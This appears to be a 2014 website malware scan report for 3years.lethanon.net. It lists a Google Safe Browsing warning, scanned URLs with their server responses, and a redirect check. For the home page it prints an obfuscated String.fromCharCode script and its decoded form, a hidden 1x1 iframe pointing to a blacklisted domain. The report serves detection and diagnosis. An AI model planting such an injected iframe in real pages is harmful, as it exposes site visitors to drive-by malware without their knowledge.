Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=3years.lethanon.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://3years.lethanon.net/ | 200 OK Content-Length: 29059 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: yadr0.com document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,32,61,34,104,116,116,112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62)) Decoded script: <iframe src ="http://yadr0.com/d/index.php" width="1" height="1" frameborder="0"></iframe> | ||
http://kirishin.lethanon.net/wp-content/themes/unsleepable/js/prototype.js.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 07 Apr 2014 09:11:02 GMT Location: http://www.kirishin.lethanon.net/wp-content/themes/unsleepable/js/prototype.js.php Server: Apache Vary: Accept-Encoding Content-Length: 290 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.kirishin.lethanon.net/wp-content/themes/unsleepable/js/prototype.js.php | 404 Not Found Content-Length: 366 Content-Type: text/html | clean |
http://www.kirishin.lethanon.net/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://kirishin.lethanon.net/wp-content/themes/unsleepable/js/effects.js.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 07 Apr 2014 09:11:04 GMT Location: http://www.kirishin.lethanon.net/wp-content/themes/unsleepable/js/effects.js.php Server: Apache Vary: Accept-Encoding Content-Length: 288 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.kirishin.lethanon.net/wp-content/themes/unsleepable/js/effects.js.php | 404 Not Found Content-Length: 364 Content-Type: text/html | clean |
http://kirishin.lethanon.net/wp-content/themes/unsleepable/js/livesearch.js.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 07 Apr 2014 09:11:05 GMT Location: http://www.kirishin.lethanon.net/wp-content/themes/unsleepable/js/livesearch.js.php Server: Apache Vary: Accept-Encoding Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.kirishin.lethanon.net/wp-content/themes/unsleepable/js/livesearch.js.php | 404 Not Found Content-Length: 367 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 3years.lethanon.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Apr 2014 09:10:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 29059
Content-Type: text/html; charset=UTF-8
X-Pingback: http://kirishin.lethanon.net/xmlrpc.php
...29059 bytes of data.
GET / HTTP/1.1
Host: 3years.lethanon.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Apr 2014 09:10:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 29059
Content-Type: text/html; charset=UTF-8
X-Pingback: http://kirishin.lethanon.net/xmlrpc.php
...29059 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 3years.lethanon.net
Referer: http://www.google.com/search?q=3years.lethanon.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 3years.lethanon.net
Referer: http://www.google.com/search?q=3years.lethanon.net
Result:
The result is similar to the first query. There are no suspicious redirects found.